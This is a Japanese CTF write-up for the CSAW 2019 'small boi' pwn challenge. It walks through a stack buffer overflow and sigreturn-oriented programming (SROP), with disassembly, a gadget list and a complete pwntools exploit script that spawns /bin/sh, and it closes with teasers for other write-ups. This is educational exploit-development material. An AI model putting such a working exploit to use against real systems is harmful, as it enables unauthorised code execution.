--- tags: pwn --- # CSAW CTF 2019 Quals - small boi これまでに解いた問題: https://hackmd.io/@Xornet/BkemeSAhU CTFのリポジトリ: https://github.com/osirislab/CSAW-CTF-2019-Quals ## Writeup ### Outline 自明なBOFがあるのでROPをしようと思ったがバイナリがコンパクトでまともなガジェットが無い。幸いにも任意システムコールを呼ぶことが出来るのでSROPでレジスタに入れたい値をpopしてから再度システムコールを呼ぶ事で`execve("/bin/sh", null, null)`を実行する ### checksec ``` Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) ``` NX以外無効というここ最近のフルアーマーからすると信じられないレベルの貧弱さ ### Binary 非常に軽量なバイナリで多分元がC言語ではない(リポジトリあったので見たらインラインアセンブラだった)。Ghidraのデコンパイルはまともに働いてくれないのでradare2でディスアセンブル結果を覗く まずはentry部分 ``` [0x004001ad]> pdf / (fcn) entry0 29 | entry0 (); | 0x004001ad 55 push rbp | 0x004001ae 4889e5 mov rbp, rsp | 0x004001b1 b800000000 mov eax, 0 | 0x004001b6 e8d1ffffff call fcn.0040018c | 0x004001bb 4831f8 xor rax, rdi | 0x004001be 48c7c03c0000. mov rax, 0x3c ; '<' ; 60 | 0x004001c5 0f05 syscall | 0x004001c7 90 nop | 0x004001c8 5d pop rbp \ 0x004001c9 c3 ret ``` `fcn.0040018c`を呼んだ後にシステムコールを60番で呼び出している。これはexitのシステムコール番号である。 entry中で呼ばれている`fcn.0040018c`は次の通り ``` / (fcn) fcn.0040018c 33 | fcn.0040018c (); | ; var int local_20h @ rbp-0x20 | ; CALL XREF from 0x004001b6 (entry0) | 0x0040018c 55 push rbp | 0x0040018d 4889e5 mov rbp, rsp | 0x00400190 488d45e0 lea rax, qword [local_20h] | 0x00400194 4889c6 mov rsi, rax | 0x00400197 4831c0 xor rax, rax | 0x0040019a 4831ff xor rdi, rdi | 0x0040019d 48c7c2000200. mov rdx, 0x200 ; 512 | 0x004001a4 0f05 syscall | 0x004001a6 b800000000 mov eax, 0 | 0x004001ab 5d pop rbp \ 0x004001ac c3 ret ``` システムコール番号を0で呼び出していることからreadが呼ばれていることがわかる。 他の引数を見ると ``` rdi: 0 rsi: rbp - 0x20 rdx: 0x200 ``` であることから`read(0, buf, 0x200)`のような処理になっていることがわかる `buf`のサイズは0x20で確保されているように見えることからここの処理にBOFが存在する。今回はカナリアも無いことからROPが出来そうである。 ## gadget探し システムコールが使えそうなので`execve("/bin/sh", 0, 0)`を呼びたい。今回はPIE無効なので`/bin/sh`がELF中にあればそのまま使えそうである。というわけでstringsコマンドをかけるとあったので使うことにする あとは各種レジスタに値を入れれば良いのだが、バイナリが非常に小さい上に直接アセンブリを書いていそうなことから`pop rdi`のようなガジェットが存在しない。 ``` $ rpg small_boi Gadgets information ============================================================ 0x00000000004001a7 : add byte ptr [rax], al ; add byte ptr [rax], al ; pop rbp ; ret 0x0000000000400235 : add byte ptr [rax], al ; add byte ptr [rdi + rdi*8 - 1], dl ; jmp qword ptr [rcx] 0x0000000000400182 : add byte ptr [rax], al ; add byte ptr [rdi], cl ; add eax, 0x58c35d90 ; ret 0x00000000004001a9 : add byte ptr [rax], al ; pop rbp ; ret 0x0000000000400183 : add byte ptr [rax], al ; syscall 0x0000000000400237 : add byte ptr [rdi + rdi*8 - 1], dl ; jmp qword ptr [rcx] 0x0000000000400184 : add byte ptr [rdi], cl ; add eax, 0x58c35d90 ; ret 0x00000000004001a0 : add byte ptr [rdx], al ; add byte ptr [rax], al ; syscall 0x0000000000400186 : add eax, 0x58c35d90 ; ret 0x00000000004001bd : clc ; mov rax, 0x3c ; syscall 0x000000000040016b : clc ; push -0x4f ; xchg eax, edi ; shr byte ptr [rdx + rcx*2 + 0x68], 0x96 ; ret 0x5462 0x00000000004001c1 : cmp al, 0 ; add byte ptr [rax], al ; syscall 0x000000000040019c : dec dword ptr [rax - 0x39] ; ret 0x200 0x000000000040023b : jmp qword ptr [rcx] 0x000000000040016d : mov cl, 0x97 ; shr byte ptr [rdx + rcx*2 + 0x68], 0x96 ; ret 0x5462 0x00000000004001a6 : mov eax, 0 ; pop rbp ; ret 0x00000000004001bf : mov eax, 0x3c ; syscall 0x0000000000400180 : mov eax, 0xf ; syscall 0x000000000040017e : mov ebp, esp ; mov eax, 0xf ; syscall 0x000000000040019e : mov edx, 0x200 ; syscall 0x00000000004001be : mov rax, 0x3c ; syscall 0x000000000040017d : mov rbp, rsp ; mov eax, 0xf ; syscall 0x000000000040019d : mov rdx, 0x200 ; syscall 0x0000000000400187 : nop ; pop rbp ; ret 0x000000000040018a : pop rax ; ret 0x0000000000400188 : pop rbp ; ret 0x000000000040016c : push -0x4f ; xchg eax, edi ; shr byte ptr [rdx + rcx*2 + 0x68], 0x96 ; ret 0x5462 0x000000000040017c : push rbp ; mov rbp, rsp ; mov eax, 0xf ; syscall 0x0000000000400189 : ret 0x000000000040019f : ret 0x200 0x0000000000400174 : ret 0x5462 0x000000000040016f : shr byte ptr [rdx + rcx*2 + 0x68], 0x96 ; ret 0x5462 0x0000000000400185 : syscall 0x000000000040016e : xchg eax, edi ; shr byte ptr [rdx + rcx*2 + 0x68], 0x96 ; ret 0x5462 0x0000000000400173 : xchg eax, esi ; ret 0x5462 0x00000000004001bc : xor eax, edi ; mov rax, 0x3c ; syscall 0x000000000040019b : xor edi, edi ; mov rdx, 0x200 ; syscall Unique gadgets found: 37 ``` (`rpg`は`ROPgadget.py --binary`のエイリアス) 但し`pop rax; ret`と`syscall`があるので引数を設定しないのならシステムコールは呼べそうである。そこでsigreturnシステムコールを呼ぶ ## SROP sigreturnシステムコールというものがある。x64なら15番のシステムコールで発動する。詳しい説明は参考文献に投げるが、カーネル空間からユーザ空間に戻る際に、退避しておいたユーザ空間のレジスタの値を復元するために各レジスタに対して値をpopする処理が行われる。これは"全てのレジスタ"に対してpopが行われるためスタックを次のようにしておけば任意のシステムコールが呼べそうである。 ``` (saved_rbp, any) &(pop rax; ret) 0xf // rt_sigretunのシステムコール番号 &syscall values ... ``` popする順番も決まっているので上手くスタックを構成すれば任意システムコーツが呼べる。どの順番でpopされるかは長くなるので参考文献に投げるが今回はpwntoolsにある`SigreturnFrame`を利用した。これをデフォルトの値は0(cs/gs/fsだけ確か何らかの値が入っている)で他のレジスタの値を辞書かドット記法で指定出来る(詳しくはコードを見たほうが早い)。 というわけで次のようにレジスタの値を設定すればこのシステムコールが呼ばれた後に`execve("/bin/sh", null, null)`を呼ぶことが出来そうである ``` rdi: &("/bin/sh") rsi: 0 rdx: 0 rax: 59 // execveのシステムコール番号 rip: &syscall ``` なお、今回は`mov eax, 0xf; syacall`のガジェットがあったのでraxに値をpopせずにこれをそのまま使った ## Code ```python from pwn import p64, u64, ELF, process, remote, SigreturnFrame, context, constants if __name__ == "__main__": elf = ELF("./small_boi") context.binary = elf binsh = next(elf.search(b"/bin/sh\x00")) gadgets = { "syscall": 0x400185, "pop_rax": 0x40018a, "sigreturn": 0x400180 } s = process(elf.path) junk = b"a" * 0x28 payload = junk payload += p64(gadgets["sigreturn"]) frame = SigreturnFrame() frame["rax"] = 59 frame["rdi"] = binsh frame["rsi"] = 0 frame["rdx"] = 0 frame["rip"] = gadgets["syscall"] payload += bytes(frame) s.send(payload) s.interactive() ``` ## Flag ローカルでシェル取っただけ ## 感想 TSGCTFでSROPが出たので習得するかと思ったので解きましたがこのコーナーのこの時期にやるにはちょっと簡単すぎたので応用できそうな問題を探したいです(TSGCTFのBeginner's PwnはFSA等他にやることが多すぎるので後回し) 元々WSLでやってたら何故か上手く行かなかった(公式のwriteupも他人のwriteupも全部効かなかった)のでVirtualBoxで試すついでに環境構築してこのコーナーサボってました 結果、仮想環境上のubuntu serverに対してVSCodeからSSHするのが楽だったので今度からこれでExploit開発します ## 参考文献 * [x64でSigreturn Oriented ProgrammingによるASLR+DEP+RELRO回避をやってみる - ももいろテクノロジー](http://inaz2.hatenablog.com/entry/2014/07/30/021123)
Last changed by  
Xornet
* 勉強メモ置き場 * 日記置き場
640

Read more

n日1CTFチャレンジ

こちらから全ての記事をMarkdown形式で入手出来ます 現在、このページは更新(Writeup追加, 編集, 誤字修正等)を停止しています 類似のプロジェクトをこちらで行っています、よければ見てください Rules n日に1問以上のpwnを解くかPwnに関する有益な学習をする、できればn=1を目指す -> pwnからCTF全般に変わりました 解いた場合はWriteupの執筆、学習の場合はそれに関する記事を生成することで達成したとみなす、クオリティは本人が納得出来る程度で(コードを貼って終わりのWriteupにはしたくないです) 継続期間の平均を取るので同じ日に2問以上解いた場合は翌日以降の分は実質免除される

5/31/2022
ASIS CTF Quals 2020 - babynote

これまでに解いた問題: https://hackmd.io/@Xornet/BkemeSAhU 作問者リポジトリ https://bitbucket.org/ptr-yudai/writeups-2020/src/master/ASIS_CTF_Quals_2020/ Writeup Outline いつものHeap問題...と思いきやHeap上に処理を移してROPする問題、とは言えadd(create+edit), delete, showは普通に出来る 最初に指定した分だけポインタが入る動的配列(おそらくallocaを利用)をスタック上に用意してHeap領域を指すポインタを用意している。 この際、指定した容量だけrspが上(アドレス的には小さい方)に伸びるのだが、ここで負数を指定するとrspが下がる。これはshort型で渡すので65535を指定すれば-1を指定したのと同じになる。

12/31/2020
ゼロ知識証明完全に理解(し|できなかっ)た

あゔすと!! 自分がとある秘密(例えば難しい問題の解)を知っているとする。これを他者に知らせたい場合はどうすればよいだろうか?当然"ぼく答え知ってりゅ~"と吹聴するのは駄目な訳で、しっかりした形で答えを知っていることを"証明"しなくてはならない。 手っ取り早いのはその答えを相手に伝えて検証してもらうことだが、相手に答えを知らせずに答えを持っていることを証明したいケースが存在する。このように相手に秘密情報を与えずにそれを保持していることを示すことをゼロ知識証明という。 用語 証明者(Prover): その問題の答えを知っていることを示す側 検証者(Verifier): 証明者が答えを知っていることを検証する側 以下はゼロ知識証明のプロトコルの際に必要な3要件である。

12/16/2020
InterKosenCTF 2020 - Confusing

作問者Writeup(問題リポジトリに同梱): https://github.com/theoremoon/InterKosenCTF2020-challenges/blob/master/pwn/confusing/solution/solve.py 作問者感想兼軽い解説: https://ptr-yudai.hatenablog.com/entry/2020/09/07/020405#confusing これまでに解いた問題: https://hackmd.io/@Xornet/BkemeSAhU Writeup Outline 型(int, double, string(pointer))と値を指定して保存できる問題。intとpointerはそれぞれ32bit, 48bitあれば十分なので残り16bitがマジックナンバーとして使われ、型情報が保存されている。しかし、doubleはそれが無いので型の偽装が可能。 PIE無効なのでstringに上手く偽装したdoubleをリストで開示するとAARが出来る。 これでlibcとheapのアドレスをリークする(前者はGOTから、後者は.bssセクションにある値リストから)。 heap上にある既知のチャンクのアドレスが分かっているので同じくstringに偽装した2つの値が同じdoubleをリストに配置し、deleteすることでDouble Freeに持ち込むことが出来る。これで任意の値の書き込みが可能になったのでなんとかしてシェルを起動する。

10/5/2020
Read more from Xornet
Published on HackMD